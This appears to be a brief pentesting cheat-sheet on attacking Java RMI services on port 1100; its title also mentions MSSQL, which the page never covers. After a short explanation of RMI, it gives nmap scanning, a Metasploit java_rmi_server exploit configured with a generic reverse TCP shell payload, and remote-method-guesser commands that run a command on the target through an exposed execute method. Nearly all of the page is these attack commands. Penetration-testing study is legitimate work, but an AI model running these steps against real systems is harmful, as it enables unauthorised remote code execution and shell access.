Skip to content

1100 - Pentesting mssql rmi java

RMI (Remote Method Invocation) is a Java API that allows Java objects to invoke methods on remote objects, in other words, it enables Java applications to invoke methods of objects running on remote JVMs (Java Virtual Machines). It provides a mechanism for creating distributed Java applications, where objects on different JVMs can interact with each other.

nmap

nmap -p 1100 -Pn -sC -sV $IP
1100/tcp  open  java-rmi     Java RMI

metasploit

use exploit/multi/misc/java_rmi_server
show payloads
set pyload payload/generic/shell_reverse_tcp
set RHOSTS 10.0.2.8

remote method guesser

wget https://github.com/qtc-de/remote-method-guesser/releases/download/v4.3.1/rmg-4.3.1-jar-with-dependencies.jar -O /opt/tools/rmg.jar
java -jar rmg.jar enum $IP 1100
java -jar rmg.jar call $IP 1100 '"ping -c 10 192.168.119.199"' --signature 'String execute(String cmd)' --bound-name plain-server